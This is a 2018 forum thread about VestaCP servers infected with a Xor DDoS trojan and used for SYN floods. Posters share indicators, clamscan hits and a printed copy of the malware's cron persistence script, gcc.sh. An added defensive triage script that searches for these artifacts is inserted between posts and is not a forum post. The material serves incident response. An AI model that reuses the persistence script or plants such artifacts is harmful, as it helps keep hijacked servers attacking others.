Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 2:56 pm
by albertus
Hello!

Today I was surprised to discover that 10 of our customers' servers were being exploited (attacking a Chinese IP). All these servers have nothing in common but the fact they all run VestaCP. None of my non-VestaCP servers were affected.

I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?

Thank you in advance

Kindly, Albertus

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 3:35 pm
by lukapaunovic
This happened to my clients.
I have 3 clients from different geographic locations.
All they have in common is that their server got suspended by OVH and that they are using Vesta.
They all allegedly did some syn flood to the same IP:

111.231.132.129

Which is crazy.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 3:35 pm
by dpeca
Albertus, where are your servers?
OVH ?

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 3:37 pm
by lukapaunovic
Interestingly, OVH refuses to provide access via rescue to backup files so I can investigate what happened.
For one server they provided read-only FTP access and I can't read/download/open any of the files.
This is really suspicious to me.
It looks like OVH nodes got hacked.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 3:55 pm
by dpeca
Albertus, can you tell us in which variant you installed Vesta, default (nginx+apache) or nginx+fpm?
What Linux distribution are you using?

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 3:58 pm
by StudioMaX
Me too. I've created another thread (in Russian). But my provider is FastVPS, not OVH.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 4:11 pm
by lukapaunovic
One of the clients' VPS at OVH got unlocked.
First they strongly resisted even giving rescue access to the files, and then they simply unlocked it and didn't say what the deal was.
I am just going to block that IP in the firewall, as I found no evidence in the logs, after the server got unlocked, that it was attacked like they claim.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 4:50 pm
by dmitry-itldc
The same thing: some VDSs were exploited; all have Vesta installed on CentOS 7, as far as I can see.

Most of the systems were compromised a few days ago (4-5 April). The malicious software used for the attacks is a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS); you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.

Clamscan can detect this malware, for example:

# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

We are still investigating how the systems were compromised.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 5:03 pm
by StudioMaX
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
I did not think that the infection was a few days ago. I analyzed all the logs for today - nothing suspicious, no authorization in Vesta and so on.
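
A triage check built from the indicators the two posts above name (gcc.sh in cron.hourly, the libudev.so copies, /tmp/update, and a cron entry that relaunches libudev.so), written here as an added example and not taken from any post in this thread. The path list is constructed from the thread, and the optional ROOT argument for a mounted rescue image is an assumption.

```shell
#!/bin/sh
# Added triage check for the Xor DDoS artifacts reported in this thread.
# Pass the mount point of a rescue image as ROOT to inspect an offline disk;
# with no argument it inspects the live system. Prints one line per hit and
# returns 0 when nothing is found, 1 otherwise.

# Dropped-file paths named in the thread (constructed list; extend as needed).
XORDDOS_PATHS="/etc/cron.hourly/gcc.sh
/lib/libudev.so
/lib/libudev.so.6
/usr/lib/libudev.so
/tmp/update"

check_xorddos_artifacts() {
    root="${1:-}"
    hits=0
    # 1. Known dropped files, with mtime so the infection date can be compared
    #    across servers (the sample in the thread was modified 04.04.2018).
    for p in $XORDDOS_PATHS; do
        if [ -e "$root$p" ]; then
            mtime=$(stat -c %y "$root$p" 2>/dev/null || echo unknown)
            echo "FOUND file: $root$p (mtime: $mtime)"
            hits=$((hits + 1))
        fi
    done
    # 2. Any cron entry that relaunches a libudev.so copy, whatever the script
    #    is named: this is the persistence pattern in the gcc.sh sample above.
    for f in "$root"/etc/cron.hourly/* "$root"/etc/cron.d/* "$root"/etc/crontab; do
        [ -f "$f" ] || continue
        if grep -q 'libudev\.so' "$f" 2>/dev/null; then
            echo "FOUND cron persistence: $f"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Usage: sh xorddos_check.sh --check [ROOT]
if [ "${1:-}" = "--check" ]; then
    check_xorddos_artifacts "${2:-}"
fi
```

Run it against a rescue-mounted disk (for example `--check /mnt`) so the check does not depend on tools on the possibly compromised system; a clean result does not prove anything beyond the absence of these specific names.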

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 5:11 pm
by lukapaunovic
I also see gcc.sh present and unix tool....
:(